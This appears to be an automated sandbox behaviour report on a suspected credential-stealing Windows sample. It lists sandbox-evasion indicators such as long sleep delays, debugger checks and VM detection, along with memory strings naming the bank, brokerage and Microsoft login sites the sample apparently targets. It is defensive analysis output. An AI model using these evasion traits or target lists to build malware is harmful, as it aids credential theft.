                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: 0t7MXNEfCg.exe PID: 6660, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: HrovwwypYVlFWB.exe PID: 6448, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424ED324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424ED7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424ED944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424ED504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424ED544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424ED1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424F0154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFA424EDA44
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: 15D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: 3150000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: 3050000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: 5760000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: 6760000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: 6890000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: 7890000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: C530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: D530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: D9C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Memory allocated: E9C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: 18C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: 3350000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: 5350000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: 59B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: 69B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: 6AE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: 7AE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: C610000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: D610000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Memory allocated: DAA0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F821AE rdtsc 7_2_00F821AE
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2673
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4627
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Window / User API: threadDelayed 2462
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Window / User API: threadDelayed 7509
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.8 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.3 %
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe TID: 6696 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4580 Thread sleep count: 2673 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6384 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3000 Thread sleep count: 78 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4600 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5544 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5496 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe TID: 7108 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136 Thread sleep count: 2462 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136 Thread sleep time: -4924000s >= -30000s
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136 Thread sleep count: 7509 > 30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 7136 Thread sleep time: -15018000s >= -30000s
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe TID: 6748 Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe TID: 6748 Thread sleep time: -45000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6156 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3112 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Last function: Thread delayed
                Source: 46G3-7765.15.dr Binary or memory string: dev.azure.comVMware20,11696497155j
                Source: 46G3-7765.15.dr Binary or memory string: global block list test formVMware20,11696497155
                Source: 46G3-7765.15.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 46G3-7765.15.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: svchost.exe, 00000011.00000002.2874091543.0000018565258000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: 46G3-7765.15.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 46G3-7765.15.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 46G3-7765.15.dr Binary or memory string: tasks.office.comVMware20,11696497155o
                Source: 46G3-7765.15.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 46G3-7765.15.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: nufnwZ9IW.exe, 00000010.00000002.3313297868.0000000001509000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 46G3-7765.15.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 46G3-7765.15.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 46G3-7765.15.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 46G3-7765.15.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 46G3-7765.15.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 46G3-7765.15.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 46G3-7765.15.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 46G3-7765.15.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 46G3-7765.15.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 46G3-7765.15.dr Binary or memory string: AMC password management pageVMware20,11696497155
                Source: svchost.exe, 00000011.00000002.2873444655.000001855FC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.000000000355A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                Source: firefox.exe, 00000018.00000002.1395548752.0000019CD306D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: 46G3-7765.15.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 46G3-7765.15.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 46G3-7765.15.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 46G3-7765.15.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 46G3-7765.15.dr Binary or memory string: discord.comVMware20,11696497155f
                Source: 46G3-7765.15.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 46G3-7765.15.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 46G3-7765.15.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 46G3-7765.15.dr Binary or memory string: outlook.office.comVMware20,11696497155s
                Source: 46G3-7765.15.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 46G3-7765.15.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 46G3-7765.15.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F821AE rdtsc 7_2_00F821AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_004179B3 LdrLoadDll, 7_2_004179B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EB80E9 mov eax, dword ptr fs:[00000030h] 7_2_00EB80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EAA0E3 mov ecx, dword ptr fs:[00000030h] 7_2_00EAA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F360E0 mov eax, dword ptr fs:[00000030h] 7_2_00F360E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EAC0F0 mov eax, dword ptr fs:[00000030h] 7_2_00EAC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EF20F0 mov ecx, dword ptr fs:[00000030h] 7_2_00EF20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F320DE mov eax, dword ptr fs:[00000030h] 7_2_00F320DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EA80A0 mov eax, dword ptr fs:[00000030h] 7_2_00EA80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F760B8 mov eax, dword ptr fs:[00000030h] 7_2_00F760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F760B8 mov ecx, dword ptr fs:[00000030h] 7_2_00F760B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F480A8 mov eax, dword ptr fs:[00000030h] 7_2_00F480A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EB208A mov eax, dword ptr fs:[00000030h] 7_2_00EB208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EDC073 mov eax, dword ptr fs:[00000030h] 7_2_00EDC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F36050 mov eax, dword ptr fs:[00000030h] 7_2_00F36050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EB2050 mov eax, dword ptr fs:[00000030h] 7_2_00EB2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F46030 mov eax, dword ptr fs:[00000030h] 7_2_00F46030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EAA020 mov eax, dword ptr fs:[00000030h] 7_2_00EAA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00EAC020 mov eax, dword ptr fs:[00000030h] 7_2_00EAC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F34000 mov ecx, dword ptr fs:[00000030h] 7_2_00F34000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h] 7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F52000 mov eax, dword ptr fs:[00000030h]7_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE016 mov eax, dword ptr fs:[00000030h]7_2_00ECE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE01F8 mov eax, dword ptr fs:[00000030h]7_2_00EE01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F861E5 mov eax, dword ptr fs:[00000030h]7_2_00F861E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov ecx, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E1D0 mov eax, dword ptr fs:[00000030h]7_2_00F2E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F761C3 mov eax, dword ptr fs:[00000030h]7_2_00F761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F761C3 mov eax, dword ptr fs:[00000030h]7_2_00F761C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F821AE mov eax, dword ptr fs:[00000030h]7_2_00F821AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF0185 mov eax, dword ptr fs:[00000030h]7_2_00EF0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3019F mov eax, dword ptr fs:[00000030h]7_2_00F3019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54180 mov eax, dword ptr fs:[00000030h]7_2_00F54180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F54180 mov eax, dword ptr fs:[00000030h]7_2_00F54180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA197 mov eax, dword ptr fs:[00000030h]7_2_00EAA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA197 mov eax, dword ptr fs:[00000030h]7_2_00EAA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAA197 mov eax, dword ptr fs:[00000030h]7_2_00EAA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6C188 mov eax, dword ptr fs:[00000030h]7_2_00F6C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6C188 mov eax, dword ptr fs:[00000030h]7_2_00F6C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84164 mov eax, dword ptr fs:[00000030h]7_2_00F84164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84164 mov eax, dword ptr fs:[00000030h]7_2_00F84164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F48158 mov eax, dword ptr fs:[00000030h]7_2_00F48158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov ecx, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F44144 mov eax, dword ptr fs:[00000030h]7_2_00F44144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC156 mov eax, dword ptr fs:[00000030h]7_2_00EAC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6154 mov eax, dword ptr fs:[00000030h]7_2_00EB6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB6154 mov eax, dword ptr fs:[00000030h]7_2_00EB6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE0124 mov eax, dword ptr fs:[00000030h]7_2_00EE0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F70115 mov eax, dword ptr fs:[00000030h]7_2_00F70115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov ecx, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov eax, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov eax, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A118 mov eax, dword ptr fs:[00000030h]7_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov eax, dword ptr fs:[00000030h]7_2_00F5E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E10E mov ecx, dword ptr fs:[00000030h]7_2_00F5E10E
